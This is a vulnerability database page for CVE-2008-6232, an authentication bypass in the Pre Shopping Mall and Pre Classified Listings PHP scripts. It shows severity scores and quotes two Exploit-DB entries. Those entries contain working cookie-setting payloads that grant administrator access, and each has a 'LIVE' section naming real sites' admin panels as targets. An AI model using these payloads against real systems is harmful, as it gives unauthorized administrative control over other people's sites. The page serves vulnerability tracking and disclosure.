CVE-2008-6232
published 2009-02-20CVE-2008-6232: Pre Shopping Mall allows remote attackers to bypass authentication and gain administrative access by setting the (1) adminname and the (2) adminid cookies to…
PriorityP354high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.86%
85.0th percentile
Pre Shopping Mall allows remote attackers to bypass authentication and gain administrative access by setting the (1) adminname and the (2) adminid cookies to "admin".
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pre Shopping Mall - Insecure Cookie Handling
exploitdb·2008-11-05
CVE-2008-6232 Pre Shopping Mall - Insecure Cookie Handling
Pre Shopping Mall - Insecure Cookie Handling
---
IN THE NAME OF ALLAH
PRE SHOPPING MALL Insecure Cookie Handling
[~] Script: PRE SHOPPING MALL
[~] Language : PHP
[~] Website[main]: http://www.preproject.com
[~] Website[script]: http://www.preproject.com/emall.asp
[~] Type : Commercial
[~] Report-Date : 05/11/2008
[~] Founder : G4N0K
===[ Insecure Cookie Handling ]===
Admin Panel: http://localhost/[path]/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";
===[ LIVE ]===
Admin Panel: http://preproject.com/emall/admin/loginform.php
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";
===[ Greetz ]===
[~] ALLAH
[~] Tornado2800
[~] Hussain-X
//Are ya looking for something that has
Exploit-DB
Pre Classified Listings - Insecure Cookie Handling
exploitdb·2008-11-05
CVE-2008-6232 Pre Classified Listings - Insecure Cookie Handling
Pre Classified Listings - Insecure Cookie Handling
---
IN THE NAME OF ALLAH
Pre Classified Listings PHP Insecure Cookie Handling
[~] Script: Pre Classified Listings PHP version
[~] Language : PHP
[~] Website[main]: http://www.preproject.com
[~] Website[script]: http://www.preproject.com/pclphp.asp
[~] Type : Commercial
[~] Report-Date : 05/11/2008
[~] Founder : G4N0K
===[ Insecure Cookie Handling ]===
Admin Panel: http://localhost/[path]/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";
===[ LIVE ]===
Admin Panel: http://www.hostnomi.net/classi/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";
===[ Greetz ]===
[~] ALLAH
[~] Tornado2800
[~] Hussain-X
//Are ya looki
No writeups or analysis indexed.
http://secunia.com/advisories/32557http://www.vupen.com/english/advisories/2008/3017https://exchange.xforce.ibmcloud.com/vulnerabilities/48984https://www.exploit-db.com/exploits/6998http://secunia.com/advisories/32557http://www.vupen.com/english/advisories/2008/3017https://exchange.xforce.ibmcloud.com/vulnerabilities/48984https://www.exploit-db.com/exploits/6998
2009-02-20
Published